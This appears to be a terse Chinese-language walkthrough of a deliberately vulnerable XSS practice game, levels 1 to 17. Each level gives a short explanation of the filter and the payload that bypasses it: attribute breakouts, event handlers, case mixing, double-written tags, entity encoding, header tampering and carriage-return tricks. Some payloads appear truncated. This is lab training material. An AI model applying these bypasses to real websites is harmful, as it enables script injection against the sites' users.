xss-game
level1
level2
用户输入在input标签value属性中变成了字符串,闭合双引号和input标签即可
">
level3
对<>作了特殊字符html转义,但''引号可以使用,用'闭合input标签的value属性字符串,为input标签添加onmouseover鼠标在元素上的移动属性
' onmousemove='alert(1)
level4
同level3,input标签的value属性用双引号闭合
" onmousemove="alert(1)
level5
对script和on做了过滤,使用伪协议
">xss
level6
对href也做了过滤,但是没有过滤大小写
" oNmousemove="alert(1)
level7
尝试使用script标签,发现script被删掉,剩余的正常,双写绕过
">alert(1)
level8
对javascript做了过滤,使用html实体编码
javascript:alert(1)
level9
输入的网址内必须要有http://,否则判断为不合法,直接将http://放入alert内
javascript:alert('http://')
level10
有三个隐藏的input标签,第三个的t_sort属性值是可以通过在url中构造参数修改的,修改标签,取消隐藏属性,增加鼠标事件
t_sort="type="text"%20%20onmousemove="alert(1)
level11
有一个隐藏的input标签的value属性是值 html请求头中的reference(源地址)属性值,修改请求头
level12
有一个隐藏的input标签的value属性是值 html请求头中的user-agent属性值,修改请求头
level13
请求头中有set-cookies,修改之
level14
页面有一个ifarame标签请求了http://www.exifviewer.org/获得响应文本显示在网页上,使用burpsuite修改返回的文本
level15
ng-include用于加载外部html内容作为子节点
src="level1.php?name="
level16
对script和空格做了过滤,使用%0d回车代替空格
keyword=
level17
第二个参数加空格后将作为embed的属性
arg01=a&arg02=%20onmouseover=alert()